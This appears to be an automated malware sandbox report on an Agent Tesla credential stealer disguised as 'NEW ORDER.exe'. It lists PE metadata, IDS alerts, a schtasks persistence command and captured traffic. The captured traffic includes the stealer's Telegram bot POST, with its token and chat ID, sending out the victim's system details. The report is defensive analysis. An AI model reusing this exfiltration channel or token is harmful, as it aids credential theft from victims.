                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al

                                                              Data Directories

                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xd3e880x53.text
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x600.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xd60000xc.reloc
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                              Sections

                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x20000xd1ee40xd2000False0.8591878255208333data7.7728861482664335IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .rsrc0xd40000x6000x600False0.4264322916666667data4.095928346302954IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .reloc0xd60000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                              Resources

                                                              NameRVASizeTypeLanguageCountry
                                                              RT_VERSION0xd40900x324data
                                                              RT_MANIFEST0xd43c40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                              Imports

                                                              DLLImport
                                                              mscoree.dll_CorExeMain

                                                              Network Behavior

                                                              Snort IDS Alerts

                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                              192.168.2.4149.154.167.220231534432851779 08/08/22-17:42:49.480990TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil23153443192.168.2.4149.154.167.220

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Aug 8, 2022 17:42:48.335764885 CEST49755443192.168.2.4149.154.167.220
                                                              Aug 8, 2022 17:42:48.335808039 CEST44349755149.154.167.220192.168.2.4
                                                              Aug 8, 2022 17:42:48.335917950 CEST49755443192.168.2.4149.154.167.220
                                                              Aug 8, 2022 17:42:48.415303946 CEST49755443192.168.2.4149.154.167.220
                                                              Aug 8, 2022 17:42:48.415359020 CEST44349755149.154.167.220192.168.2.4
                                                              Aug 8, 2022 17:42:48.479599953 CEST44349755149.154.167.220192.168.2.4
                                                              Aug 8, 2022 17:42:48.479718924 CEST49755443192.168.2.4149.154.167.220
                                                              Aug 8, 2022 17:42:48.482686996 CEST49755443192.168.2.4149.154.167.220
                                                              Aug 8, 2022 17:42:48.482709885 CEST44349755149.154.167.220192.168.2.4
                                                              Aug 8, 2022 17:42:48.482904911 CEST44349755149.154.167.220192.168.2.4
                                                              Aug 8, 2022 17:42:48.562361002 CEST49755443192.168.2.4149.154.167.220
                                                              Aug 8, 2022 17:42:49.452589035 CEST49755443192.168.2.4149.154.167.220
                                                              Aug 8, 2022 17:42:49.479407072 CEST44349755149.154.167.220192.168.2.4
                                                              Aug 8, 2022 17:42:49.480860949 CEST49755443192.168.2.4149.154.167.220
                                                              Aug 8, 2022 17:42:49.523380041 CEST44349755149.154.167.220192.168.2.4
                                                              Aug 8, 2022 17:42:49.577591896 CEST44349755149.154.167.220192.168.2.4
                                                              Aug 8, 2022 17:42:49.577666044 CEST44349755149.154.167.220192.168.2.4
                                                              Aug 8, 2022 17:42:49.577759981 CEST49755443192.168.2.4149.154.167.220
                                                              Aug 8, 2022 17:42:49.578996897 CEST49755443192.168.2.4149.154.167.220

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Aug 8, 2022 17:42:48.270077944 CEST5377553192.168.2.48.8.8.8
                                                              Aug 8, 2022 17:42:48.287147999 CEST53537758.8.8.8192.168.2.4

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                              Aug 8, 2022 17:42:48.270077944 CEST192.168.2.48.8.8.80x6a39Standard query (0)api.telegram.orgA (IP address)IN (0x0001)

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                              Aug 8, 2022 17:42:48.287147999 CEST8.8.8.8192.168.2.40x6a39No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)

                                                              HTTP Request Dependency Graph

                                                              • api.telegram.org

                                                              HTTPS Proxied Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              0192.168.2.423153149.154.167.220443C:\Users\user\Desktop\NEW ORDER.exe
                                                              TimestampkBytes transferredDirectionData
                                                              2022-08-08 15:42:49 UTC0OUTPOST /bot5400730219:AAF6yJi-sq4as7PeSLNrtiGC96YCaGma0y8/sendDocument HTTP/1.1
                                                              Content-Type: multipart/form-data; boundary=---------------------------8da7969e2d70cb4
                                                              Host: api.telegram.org
                                                              Content-Length: 770
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              2022-08-08 15:42:49 UTC0INHTTP/1.1 100 Continue
                                                              2022-08-08 15:42:49 UTC0OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 37 39 36 39 65 32 64 37 30 63 62 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 35 39 37 32 38 37 33 34 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 37 39 36 39 65 32 64 37 30 63 62 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 6a 6f 6e 65 73 2f 39 32 38 31 30 30 0a 4f 53 46 75 6c 6c
                                                              Data Ascii: -----------------------------8da7969e2d70cb4Content-Disposition: form-data; name="chat_id"5597287344-----------------------------8da7969e2d70cb4Content-Disposition: form-data; name="caption"New PW Recovered!User Name: user/928100OSFull
                                                              2022-08-08 15:42:49 UTC1INHTTP/1.1 200 OK
                                                              Server: nginx/1.18.0
                                                              Date: Mon, 08 Aug 2022 15:42:49 GMT
                                                              Content-Type: application/json
                                                              Content-Length: 603
                                                              Connection: close
                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                              Access-Control-Allow-Origin: *
                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                              {"ok":true,"result":{"message_id":493,"from":{"id":5400730219,"is_bot":true,"first_name":"igna_bot","username":"ignebot"},"chat":{"id":5597287344,"first_name":"King","last_name":"Mike","type":"private"},"date":1659973369,"document":{"file_name":"user-928100 2022-08-08 06-14-34.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIB7WLxLvnOVwdyVZpDs7AEmFk9jb3rAALvDAACNLmIUy4FUt_2dWo2KQQ","file_unique_id":"AgAD7wwAAjS5iFM","file_size":200},"caption":"New PW Recovered!\n\nUser Name: user/928100\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                              Statistics

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              General

                                                              Target ID:0
                                                              Start time:17:42:10
                                                              Start date:08/08/2022
                                                              Path:C:\Users\user\Desktop\NEW ORDER.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\NEW ORDER.exe"
                                                              Imagebase:0x960000
                                                              File size:862720 bytes
                                                              MD5 hash:8577851A51C92B4D637B3AC6F58763A1
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Yara matches:
                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.277628722.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.277628722.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000000.00000002.277628722.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                              Reputation:low

                                                              General

                                                              Target ID:4
                                                              Start time:17:42:26
                                                              Start date:08/08/2022
                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvabCK" /XML "C:\Users\user\AppData\Local\Temp\tmp2F70.tmp
                                                              Imagebase:0x170000
                                                              File size:185856 bytes
                                                              MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              General

                                                              Target ID:5
                                                              Start time:17:42:27
                                                              Start date:08/08/2022
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff647620000
                                                              File size:625664 bytes
                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              General

                                                              Target ID:7
                                                              Start time:17:42:28
                                                              Start date:08/08/2022
                                                              Path:C:\Users\user\Desktop\NEW ORDER.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:{path}
                                                              Imagebase:0x740000
                                                              File size:862720 bytes
                                                              MD5 hash:8577851A51C92B4D637B3AC6F58763A1
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Yara matches:
                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.501750120.0000000002BC3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000000.265553300.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000007.00000000.265553300.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000007.00000000.265553300.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                              Reputation:low

                                                              General

                                                              Target ID:24
                                                              Start time:17:43:32
                                                              Start date:08/08/2022
                                                              Path:C:\Windows\System32\svchost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                              Imagebase:0x7ff7338d0000
                                                              File size:51288 bytes
                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              General

                                                              Target ID:25
                                                              Start time:17:43:33
                                                              Start date:08/08/2022
                                                              Path:C:\Windows\System32\WerFault.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\WerFault.exe -pss -s 488 -p 1468 -ip 1468
                                                              Imagebase:0x7ff770e00000
                                                              File size:494488 bytes
                                                              MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Disassembly

                                                              No disassembly